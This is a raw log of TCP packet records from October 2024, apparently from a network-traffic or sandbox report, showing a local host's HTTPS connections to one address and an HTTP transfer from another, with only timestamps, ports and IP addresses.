Oct 7, 2024 03:15:48.319228888 CEST	49886	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.319233894 CEST	443	49886	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.332036018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:48.336970091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:48.417026043 CEST	443	49886	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.417123079 CEST	443	49886	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.417195082 CEST	49886	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.417491913 CEST	49886	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.417542934 CEST	443	49886	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.417572021 CEST	49886	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.417588949 CEST	443	49886	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.420660019 CEST	49891	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.420701027 CEST	443	49891	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.420789003 CEST	49891	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.421638012 CEST	49891	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.421650887 CEST	443	49891	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.512669086 CEST	443	49887	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.513283014 CEST	49887	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.513302088 CEST	443	49887	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.513801098 CEST	49887	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.513804913 CEST	443	49887	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.519005060 CEST	443	49888	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.519407988 CEST	49888	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.519418955 CEST	443	49888	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.519937038 CEST	49888	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.519941092 CEST	443	49888	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.536079884 CEST	443	49889	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.536653042 CEST	49889	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.536689997 CEST	443	49889	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.537271976 CEST	49889	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.537278891 CEST	443	49889	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.585285902 CEST	443	49890	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.585849047 CEST	49890	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.585923910 CEST	443	49890	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.586319923 CEST	49890	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.586334944 CEST	443	49890	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.611624002 CEST	443	49887	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.611870050 CEST	443	49887	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.611932039 CEST	443	49887	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.611951113 CEST	49887	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.612013102 CEST	49887	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.612061024 CEST	49887	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.612061024 CEST	49887	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.612078905 CEST	443	49887	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.612088919 CEST	443	49887	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.615103006 CEST	49892	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.615154982 CEST	443	49892	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.615250111 CEST	49892	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.615403891 CEST	49892	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.615418911 CEST	443	49892	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.616837025 CEST	443	49888	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.617049932 CEST	443	49888	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.617106915 CEST	49888	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.617176056 CEST	49888	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.617182016 CEST	443	49888	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.617192030 CEST	49888	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.617197037 CEST	443	49888	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.620518923 CEST	49893	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.620577097 CEST	443	49893	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.620816946 CEST	49893	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.621227980 CEST	49893	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.621251106 CEST	443	49893	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.635216951 CEST	443	49889	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.635524988 CEST	443	49889	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.635582924 CEST	443	49889	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.635591984 CEST	49889	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.635643005 CEST	49889	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.635698080 CEST	49889	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.635723114 CEST	443	49889	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.635735035 CEST	49889	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.635740995 CEST	443	49889	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.639709949 CEST	49894	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.639760017 CEST	443	49894	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.639831066 CEST	49894	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.640129089 CEST	49894	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.640150070 CEST	443	49894	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.688421965 CEST	443	49890	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.688503981 CEST	443	49890	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.688592911 CEST	49890	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.688884020 CEST	49890	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.688905001 CEST	443	49890	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.688932896 CEST	49890	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.688944101 CEST	443	49890	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.692368984 CEST	49895	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.692464113 CEST	443	49895	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.692543030 CEST	49895	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.692683935 CEST	49895	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:48.692717075 CEST	443	49895	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:48.868570089 CEST	49703	80	192.168.2.5	192.229.211.108
Oct 7, 2024 03:15:48.873842955 CEST	80	49703	192.229.211.108	192.168.2.5
Oct 7, 2024 03:15:48.873936892 CEST	49703	80	192.168.2.5	192.229.211.108
Oct 7, 2024 03:15:48.965101957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:48.965209007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.019490004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.019594908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.024436951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024486065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024509907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024523020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024578094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024590969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024672985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024686098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024701118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024708033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.024727106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024736881 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.024774075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.024774075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024787903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024820089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024842024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.024878979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.024908066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024920940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024925947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024964094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.024966002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.024986029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.025017977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.025234938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.025320053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.029584885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.029638052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.029647112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.029661894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.029689074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.029722929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.029747963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:49.029771090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.029783010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.029824018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.029849052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.029881001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.029934883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.029952049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.029977083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.029989004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.030019045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.030031919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.030056000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.030067921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.030102968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.030116081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.030128002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.030139923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.030164003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.030177116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.030189991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.031038046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.031049967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.031085968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.031099081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.031147957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.031161070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.031172991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.031188011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034450054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034506083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034531116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034543991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034559011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034584045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034595966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034622908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034698963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034712076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034724951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034739971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034812927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034826994 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034955025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034967899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.034980059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:49.073009014 CEST	443	49891	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.073817968 CEST	49891	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.073828936 CEST	443	49891	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.074393988 CEST	49891	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.074398041 CEST	443	49891	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.172728062 CEST	443	49891	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.172800064 CEST	443	49891	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.172910929 CEST	443	49891	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.172924042 CEST	49891	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.173078060 CEST	49891	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.173261881 CEST	49891	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.173261881 CEST	49891	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.173280001 CEST	443	49891	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.173289061 CEST	443	49891	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.176517010 CEST	49896	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.176603079 CEST	443	49896	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.176712036 CEST	49896	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.176865101 CEST	49896	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.176901102 CEST	443	49896	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.252449036 CEST	443	49892	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.256902933 CEST	49892	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.256963968 CEST	443	49892	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.257463932 CEST	49892	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.257477045 CEST	443	49892	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.261620045 CEST	443	49893	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.264617920 CEST	49893	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.264651060 CEST	443	49893	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.264991999 CEST	49893	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.264997959 CEST	443	49893	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.328129053 CEST	443	49894	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.328836918 CEST	49894	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.328854084 CEST	443	49894	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.329344988 CEST	49894	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.329349041 CEST	443	49894	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.332106113 CEST	443	49895	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.332550049 CEST	49895	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.332592010 CEST	443	49895	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.333134890 CEST	49895	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.333146095 CEST	443	49895	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.352916956 CEST	443	49892	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.353187084 CEST	443	49892	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.353472948 CEST	49892	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.353782892 CEST	49892	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.353806973 CEST	443	49892	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.353843927 CEST	49892	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.353852034 CEST	443	49892	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.357708931 CEST	49897	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.357743979 CEST	443	49897	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.357867956 CEST	49897	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.358133078 CEST	49897	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.358145952 CEST	443	49897	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.362956047 CEST	443	49893	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.362983942 CEST	443	49893	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.363027096 CEST	443	49893	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.363095999 CEST	49893	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.363137007 CEST	49893	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.363351107 CEST	49893	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.363373995 CEST	443	49893	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.363396883 CEST	49893	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.363401890 CEST	443	49893	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.367100000 CEST	49898	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.367110968 CEST	443	49898	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.367255926 CEST	49898	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.367394924 CEST	49898	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.367400885 CEST	443	49898	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.429163933 CEST	443	49894	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.429320097 CEST	443	49894	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.429492950 CEST	49894	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.429737091 CEST	49894	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.429757118 CEST	443	49894	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.429826021 CEST	49894	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.429833889 CEST	443	49894	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.431771994 CEST	443	49895	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.431811094 CEST	443	49895	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.431888103 CEST	443	49895	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.431910992 CEST	49895	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.431962013 CEST	49895	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.432152033 CEST	49895	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.432185888 CEST	443	49895	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.432212114 CEST	49895	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.432228088 CEST	443	49895	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.433480978 CEST	49899	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.433516026 CEST	443	49899	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.433610916 CEST	49899	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.433751106 CEST	49899	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.433764935 CEST	443	49899	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.434900999 CEST	49900	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.434943914 CEST	443	49900	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.435039997 CEST	49900	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.435137987 CEST	49900	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.435149908 CEST	443	49900	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.823508024 CEST	443	49896	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.824578047 CEST	49896	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.824664116 CEST	443	49896	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:49.825644970 CEST	49896	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:49.825653076 CEST	443	49896	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.079603910 CEST	443	49896	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.079632044 CEST	443	49896	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.079698086 CEST	443	49896	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.079705954 CEST	49896	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.079768896 CEST	49896	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.080106974 CEST	49896	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.080122948 CEST	443	49896	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.080142021 CEST	49896	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.080148935 CEST	443	49896	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.080270052 CEST	443	49898	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.080948114 CEST	443	49897	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.081787109 CEST	49897	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.081804991 CEST	443	49897	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.082278967 CEST	49897	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.082283020 CEST	443	49897	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.082916021 CEST	49898	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.082921028 CEST	443	49898	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.083475113 CEST	49898	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.083479881 CEST	443	49898	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.085689068 CEST	49901	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.085738897 CEST	443	49901	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.085818052 CEST	49901	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.085984945 CEST	49901	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.085997105 CEST	443	49901	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.179246902 CEST	443	49898	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.179632902 CEST	443	49898	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.179830074 CEST	49898	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.179852962 CEST	443	49897	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.179892063 CEST	49898	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.179904938 CEST	443	49897	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.179909945 CEST	443	49898	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.179964066 CEST	49897	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.179966927 CEST	443	49897	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.180030107 CEST	49897	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.180097103 CEST	49897	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.180102110 CEST	443	49897	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.180110931 CEST	49897	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.180115938 CEST	443	49897	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.183609009 CEST	49902	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.183661938 CEST	443	49902	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.183784008 CEST	49902	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.183823109 CEST	49903	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.183866978 CEST	443	49903	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.183933020 CEST	49903	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.183933020 CEST	49902	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.183949947 CEST	443	49902	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.184139013 CEST	49903	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.184155941 CEST	443	49903	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.262708902 CEST	443	49900	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.263190985 CEST	49900	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.263206005 CEST	443	49900	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.263688087 CEST	49900	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.263694048 CEST	443	49900	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.266659021 CEST	443	49899	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.267029047 CEST	49899	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.267049074 CEST	443	49899	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.267366886 CEST	49899	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.267371893 CEST	443	49899	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.361278057 CEST	443	49900	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.361387014 CEST	443	49900	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.361700058 CEST	49900	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.361701012 CEST	49900	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.361737967 CEST	49900	443	192.168.2.5	13.107.246.45
